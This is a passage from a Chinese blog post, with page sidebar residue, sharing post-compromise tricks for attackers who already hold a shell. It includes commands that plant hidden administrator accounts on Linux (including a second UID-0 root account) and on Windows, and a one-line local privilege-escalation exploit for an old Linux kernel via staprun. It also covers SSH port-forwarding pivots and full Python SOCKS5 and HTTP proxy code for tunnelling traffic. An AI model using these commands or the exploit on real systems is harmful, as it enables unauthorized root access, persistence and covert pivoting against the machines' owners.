- 浏览: 632104 次
- 性别:
- 来自: 西安
文章分类
最新评论
-
d1438138:
[img][/img]
google api 的一些神奇使用 -
waykingeye:
[i][b][u]引用[list]
[*][img][url] ...
No result defined for action and result input -
tss0823:
...
No result defined for action and result input -
yahier:
有什么办法能够捕捉,然后给出自定义的提示呢
No result defined for action and result input -
chen_lian:
恩恩 按照上面的代码测试一下觉得很对
java创建目录
1. 当得到linux root shell时,采用如下语句可以添加管理员帐户
写道
useradd icefish //添加icefish用户
passwd icefish //设置密码
awk -F: '{print $1}' /etc/passwd 可以查看有多少用户
不过刚建立的账户都是被锁状态需要解锁
usermod -U icefish
或者
usermod -u uid
usermod -G root icefish //添加管理员组
或者
usermod -g 0 icefish
就ok了
下面是usermod的帮助文档那个
[root@localhost ~]# usermod
Usage: usermod [options] LOGIN
Options:
-a, --append append the user to the supplemental GROUPS
(use only with -G)
-c, --comment COMMENT new value of the GECOS field
-d, --home HOME_DIR new home directory for the user account
-e, --expiredate EXPIRE_DATE set account expiration date to EXPIRE_DATE
-f, --inactive INACTIVE set password inactive after expiration
to INACTIVE
-g, --gid GROUP force use GROUP as new primary group
-G, --groups GROUPS new list of supplementary GROUPS
-h, --help display this help message and exit
-l, --login NEW_LOGIN new value of the login name
-L, --lock lock the user account
-m, --move-home move contents of the home directory to the new
location (use only with -d)
-o, --non-unique allow using duplicate (non-unique) UID
-p, --password PASSWORD use encrypted password for the new password
-s, --shell SHELL new login shell for the user account
-u, --uid UID new UID for the user account
-U, --unlock unlock the user account
-Z, --selinux-user new selinux user mapping for the user account
passwd icefish //设置密码
awk -F: '{print $1}' /etc/passwd 可以查看有多少用户
不过刚建立的账户都是被锁状态需要解锁
usermod -U icefish
或者
usermod -u uid
usermod -G root icefish //添加管理员组
或者
usermod -g 0 icefish
就ok了
下面是usermod的帮助文档那个
[root@localhost ~]# usermod
Usage: usermod [options] LOGIN
Options:
-a, --append append the user to the supplemental GROUPS
(use only with -G)
-c, --comment COMMENT new value of the GECOS field
-d, --home HOME_DIR new home directory for the user account
-e, --expiredate EXPIRE_DATE set account expiration date to EXPIRE_DATE
-f, --inactive INACTIVE set password inactive after expiration
to INACTIVE
-g, --gid GROUP force use GROUP as new primary group
-G, --groups GROUPS new list of supplementary GROUPS
-h, --help display this help message and exit
-l, --login NEW_LOGIN new value of the login name
-L, --lock lock the user account
-m, --move-home move contents of the home directory to the new
location (use only with -d)
-o, --non-unique allow using duplicate (non-unique) UID
-p, --password PASSWORD use encrypted password for the new password
-s, --shell SHELL new login shell for the user account
-u, --uid UID new UID for the user account
-U, --unlock unlock the user account
-Z, --selinux-user new selinux user mapping for the user account
windows 的就不用多说了
写道
net user icetest icetest /add
net localgroup administrators icetest /add
net localgroup administrators icetest /add
当然我也见过一种一句的linux加账户的
写道
useradd -u 0 -o -g root -G root -d /home/icetest2 icetest2
passwd icetest2
passwd icetest2
这种加出来的用户直接和管理员root同uid ,比较方便
2 。一句话linux提权,
查看linux 内核版本 uname -a
写道
Linux 2.6.18-194.el5 提权
一句话提权
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
一句话提权
printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
这个比较方便
3. ssh端口转发代理,这个作用大家都懂的
第一种可以利用windows下的客户端例如securCRT中的
session options中得Port Forwarding
第二种就是自己手动命令了
http://7056824.blog.51cto.com/69854/279714
这篇大致讲的还是蛮细的。
基本上就是
ssh -L <local port>:<remote host>:<remote port> <SSH hostname> 以及
ssh -D <local port> <SSH Server>这三种应该是比较常用的 我个人觉得 ssh -D 7001 192.168.4.130这种帮助比较大,以及第一种本地代理的方式 |
第三种就是借助别的代码来直接实现socket代理
我比较倾向于python的,但是我复现的时候没成功,
有以下两种,分别是socket5和http代理
#! /usr/bin/env python #coding=utf-8 import socket, sys, select, SocketServer, struct, time class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass class Socks5Server(SocketServer.StreamRequestHandler): def handle_tcp(self, sock, remote): fdset = [sock, remote] while True: r, w, e = select.select(fdset, [], []) if sock in r: if remote.send(sock.recv(4096)) <= 0: break if remote in r: if sock.send(remote.recv(4096)) <= 0: break def handle(self): try: print 'socks connection from ', self.client_address sock = self.connection # 1. Version sock.recv(262) sock.send(b"\x05\x00"); # 2. Request data = self.rfile.read(4) mode = ord(data[1]) addrtype = ord(data[3]) if addrtype == 1: # IPv4 addr = socket.inet_ntoa(self.rfile.read(4)) elif addrtype == 3: # Domain name addr = self.rfile.read(ord(sock.recv(1)[0])) port = struct.unpack('>H', self.rfile.read(2)) reply = b"\x05\x00\x00\x01" try: if mode == 1: # 1. Tcp connect remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((addr, port[0])) print 'Tcp connect to', addr, port[0] else: reply = b"\x05\x07\x00\x01" # Command not supported local = remote.getsockname() reply += socket.inet_aton(local[0]) + struct.pack(">H", local[1]) except socket.error: # Connection refused reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00' sock.send(reply) # 3. Transfering if reply[1] == '\x00': # Success if mode == 1: # 1. Tcp connect self.handle_tcp(sock, remote) except socket.error: print 'socket error' def main(): server = ThreadingTCPServer(('', 2013), Socks5Server) server.serve_forever() if __name__ == '__main__': main()
http 代理
# -*- coding: cp1252 -*- # <PythonProxy.py> # #Copyright (c) <2009> <Fábio Domingues - fnds3000 in gmail.com> # #Permission is hereby granted, free of charge, to any person #obtaining a copy of this software and associated documentation #files (the "Software"), to deal in the Software without #restriction, including without limitation the rights to use, #copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the #Software is furnished to do so, subject to the following #conditions: # #The above copyright notice and this permission notice shall be #included in all copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, #EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES #OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND #NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT #HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, #WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR #OTHER DEALINGS IN THE SOFTWARE. """\ Copyright (c) <2009> <Fábio Domingues - fnds3000 in gmail.com> <MIT Licence> ************************************** *** Python Proxy - A Fast HTTP proxy *** ************************************** Neste momento este proxy é um Elie Proxy. Suporta os métodos HTTP: - OPTIONS; - GET; - HEAD; - POST; - PUT; - DELETE; - TRACE; - CONENCT. Suporta: - Conexões dos cliente em IPv4 ou IPv6; - Conexões ao alvo em IPv4 e IPv6; - Conexões todo o tipo de transmissão de dados TCP (CONNECT tunneling), p.e. ligações SSL, como é o caso do HTTPS. A fazer: - Verificar se o input vindo do cliente está correcto; - Enviar os devidos HTTP erros se não, ou simplesmente quebrar a ligação; - Criar um gestor de erros; - Criar ficheiro log de erros; - Colocar excepções nos sítios onde é previsível a ocorrência de erros, p.e.sockets e ficheiros; - Rever tudo e melhorar a estrutura do programar e colocar nomes adequados nas variáveis e métodos; - Comentar o programa decentemente; - Doc Strings. Funcionalidades futuras: - Adiconar a funcionalidade de proxy anónimo e transparente; - Suportar FTP?. (!) Atenção o que se segue só tem efeito em conexões não CONNECT, para estas o proxy é sempre Elite. Qual a diferença entre um proxy Elite, Anónimo e Transparente? - Um proxy elite é totalmente anónimo, o servidor que o recebe não consegue ter conhecimento da existência do proxy e não recebe o endereço IP do cliente; - Quando é usado um proxy anónimo o servidor sabe que o cliente está a usar um proxy mas não sabe o endereço IP do cliente; É enviado o cabeçalho HTTP "Proxy-agent". - Um proxy transparente fornece ao servidor o IP do cliente e um informação que se está a usar um proxy. São enviados os cabeçalhos HTTP "Proxy-agent" e "HTTP_X_FORWARDED_FOR". """ import socket, thread, select __version__ = '0.1.0 Draft 1' BUFLEN = 8192 VERSION = 'Python Proxy/'+__version__ HTTPVER = 'HTTP/1.1' class ConnectionHandler: def __init__(self, connection, address, timeout): self.client = connection self.client_buffer = '' self.timeout = timeout self.method, self.path, self.protocol = self.get_base_header() if self.method=='CONNECT': self.method_CONNECT() elif self.method in ('OPTIONS', 'GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'TRACE'): self.method_others() self.client.close() self.target.close() def get_base_header(self): while 1: self.client_buffer += self.client.recv(BUFLEN) end = self.client_buffer.find('\n') if end!=-1: break print '%s'%self.client_buffer[:end]#debug data = (self.client_buffer[:end+1]).split() self.client_buffer = self.client_buffer[end+1:] return data def method_CONNECT(self): self._connect_target(self.path) self.client.send(HTTPVER+' 200 Connection established\n'+ 'Proxy-agent: %s\n\n'%VERSION) self.client_buffer = '' self._read_write() def method_others(self): self.path = self.path[7:] i = self.path.find('/') host = self.path[:i] path = self.path[i:] self._connect_target(host) self.target.send('%s %s %s\n'%(self.method, path, self.protocol)+ self.client_buffer) self.client_buffer = '' self._read_write() def _connect_target(self, host): i = host.find(':') if i!=-1: port = int(host[i+1:]) host = host[:i] else: port = 80 (soc_family, _, _, _, address) = socket.getaddrinfo(host, port)[0] self.target = socket.socket(soc_family) self.target.connect(address) def _read_write(self): time_out_max = self.timeout/3 socs = [self.client, self.target] count = 0 while 1: count += 1 (recv, _, error) = select.select(socs, [], socs, 3) if error: break if recv: for in_ in recv: data = in_.recv(BUFLEN) if in_ is self.client: out = self.target else: out = self.client if data: out.send(data) count = 0 if count == time_out_max: break def start_server(host='localhost', port=8082, IPv6=False, timeout=60, handler=ConnectionHandler): if IPv6==True: soc_type=socket.AF_INET6 else: soc_type=socket.AF_INET soc = socket.socket(soc_type) soc.bind((host, port)) print "Serving on %s:%d."%(host, port)#debug soc.listen(0) while 1: thread.start_new_thread(handler, soc.accept()+(timeout,)) if __name__ == '__main__': start_server(host='',port=8082)
4 第四个其实是mysql udf提权,有空再写吧
发表评论
-
metasploit 图形化界面和自动化exploit脚本
2013-10-21 16:25 77740x01 最新版的metasploit没了图形化界面, ... -
APKTool签名的一个问题
2013-10-14 21:19 25240x01 昨天写了反编译,今天就写下签名的问题 0 ... -
APKTool打包的一个小问题
2013-10-13 20:23 248350x01,又开始写blog了,好久没有网络了,最近终于可以开 ... -
struts2远程执行漏洞学习(四)
2013-05-23 00:12 23610x01 最近又有了一个新的struts2漏洞,http:/ ... -
CVE-2013-1493 学习
2013-03-25 16:06 30240x01 这个又是一个java CVE,效果前几个一样, ... -
python调用 bing api search接口 技术
2013-01-24 23:42 95240x01 微软bing的api现在也 ... -
CVE-2013-0422 分析2
2013-01-11 23:47 35290x01 http://wcf1987.iteye.c ... -
CVE-2013-0422 学习
2013-01-11 16:26 41930x01 这个是这两天爆出来的,我构建了一个本地测试代码,主 ... -
CVE 2012 0507 分析
2012-12-17 16:00 35730x01 https://github.com/wche ... -
android 无权限 伪造短信
2012-11-06 09:15 35840x01 这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思 ... -
A new way to hack android app info
2012-11-06 01:04 1670最近新研究了一种android攻击手段,blog发到团队那里的 ... -
一次被黑追凶(未完待续)
2012-10-15 19:52 25190x01,某天师妹告诉我们某台服务器疑似被人干掉了,我果断远程 ... -
<找工作 八>整数分解为连续整数相加
2012-09-13 17:14 1558整数分解为连续整数相加,最长列表 def ... -
<找工作 五> 子数组之和最大值
2012-09-13 16:22 1208实现了两种,一种是算出最大值,一种是把最大值的子数组打印出来, ... -
python 反编译 pyc 一些心得
2012-09-06 10:59 538480x01 , 现在用python的人也多了起来,代码安全始终是 ... -
mail xss
2012-08-11 21:57 17181 最近迷上了xss,感觉各种飘逸,特别是http://www ... -
ubuntu共享文件夹设置(转)
2012-08-01 14:50 41771 sudo mount -t vboxsf samp ... -
XSS学习二
2012-07-31 15:48 12701.xss学习到今天算是告一个段落了,发现了一个sohu邮箱 ... -
我的sinaapp
2012-07-27 22:10 1278我的sinapp小家终于成型了 http://icefish ... -
phpcms v9的补充
2012-07-25 21:28 1208前一篇留了个疑问: 为什么 file_get_conten ...
相关推荐
在标题提到的"ADO中的一些总结心得"中,我们可以讨论以下几个关键知识点: 1. **ADO对象模型**:ADO的核心对象包括Connection(连接)、Command(命令)、Recordset(记录集)、Field(字段)和Parameter(参数)。...
下面将深入解析DataWindow中的一些核心功能及其在开发过程中的应用。 ### DataWindow的事务管理 DataWindow支持两种事务管理方法:`SetTrans()`和`SetTransObject()`。这两种方法虽然相似,但在具体使用时有着重要...
在Java编程中,掌握一些常用的快捷键能够极大地提高开发效率,减少无谓的手动输入时间。以下是一些在Java编程中常见的快捷键及其用途: 1. `main Alt+/`: 这个快捷键可以帮助你快速生成`main`函数的模板。在输入`...
jsp中得servlet技术,让你学会servlet
第2章 线性表(教材中得程序).rar 第2章 线性表(教材中得程序).rar 第2章 线性表(教材中得程序).rar 第2章 线性表(教材中得程序).rar 第2章 线性表(教材中得程序).rar 第2章 线性表(教材中得程序).rar
"RC中得循环检测"这个主题聚焦于CR的一种关键技术——循环检测,它在频谱感知中扮演着重要角色。循环检测主要应用于检测是否存在已授权的无线通信系统,确保认知设备不会干扰它们。 循环检测的原理基于信号的自循环...
标题中的“提取alert提示框和按钮等中html元素中得文字工具”指的是一个软件或脚本,其主要功能是能够从HTML元素,如警告对话框(alert)中的文本,以及页面上的按钮等交互元素中抓取文字内容。这种工具对于网页自动...
Struts是一个广泛使用的Java Web开发框架,它提供了一种规范化的MVC(模型-视图-控制器)架构,帮助开发者构建可维护、可扩展的Web应用程序。AJAX(Asynchronous JavaScript and XML)则是一种在客户端通过...
自己写的一个小工具,用以替换文件中得某些特定字符串,可以是文件夹中得也可以是直接文件。希望对您有所帮助
### WinPE在电脑系统维护中的重要作用 随着信息技术的迅速发展,电脑已经成为我们日常生活与工作中不可或缺的一部分。然而,随之而来的是一系列的安全问题和技术挑战,比如计算机病毒、黑客攻击以及各种形式的恶意...
ERP实施过程中得3类常见错误,敬请关注
C# 5.0不仅适用于桌面应用程序开发,也广泛应用于Web应用、移动应用和游戏开发等领域。 ### 新特性与改进 #### 1. 异步编程支持 (Async/Await) C# 5.0中最显著的新特性之一就是对异步编程的支持。通过`async`和`...
标题中的“提取ts流中得iframe”指的是在数字电视传输中如何从Transport Stream (TS) 流中解析并提取出I帧(Instantaneous Decoding Picture)的过程。在视频编码和解码领域,I帧是非常重要的,因为它能独立解码,不...
JavaServer Faces(JSF)是一种用于构建Web应用程序的MVC(Model-View-Controller)框架。Eclipse是一款流行的集成开发环境(IDE),适用于Java开发,包括JSF应用。为了在Eclipse中有效地开发和运行JSF项目,我们...
### 数据库安装中常见问题及解决方案 #### 一、引言 在进行SQL Server等数据库系统的安装过程中,用户经常会遇到各种各样的问题,这些问题如果处理不当,可能导致安装失败或者安装后缺少某些功能。...
在iOS开发中,用户经常需要从相册中选取多张图片进行操作,如上传到社交媒体、编辑或保存等。然而,iOS的系统相册API默认只支持单张图片选择,这对于需要多选功能的应用来说是一个挑战。为了实现多选相册中的图片,...
3. 教学实践案例:可能包含一些具体的教学实例,展示如何在实际课堂中应用小组合作学习,以及这些方法对学生技能提升和团队合作能力的积极影响。 4. 学习效果评估:分析采用小组合作学习后,学生在体育技能、团队...
尽管`eval`存在一些局限性和潜在的风险,但在某些特定场景下它仍然具有一定的实用价值。例如,在处理动态加载的脚本或数据时,`eval`可以用来快速执行这些脚本或数据。 ##### 示例:动态加载代码 ```javascript ...
在Delphi中,获取Excel数据的行数和列数是一项常见的任务,这通常涉及到与Microsoft Office Automation接口的交互。为了实现这一功能,我们需要使用OLE自动化技术来操控Excel对象模型。以下是一个详细的步骤和知识点...
将服务器中得日志文件进行分割,自动生成含日志后缀得文件,并存储在服务器中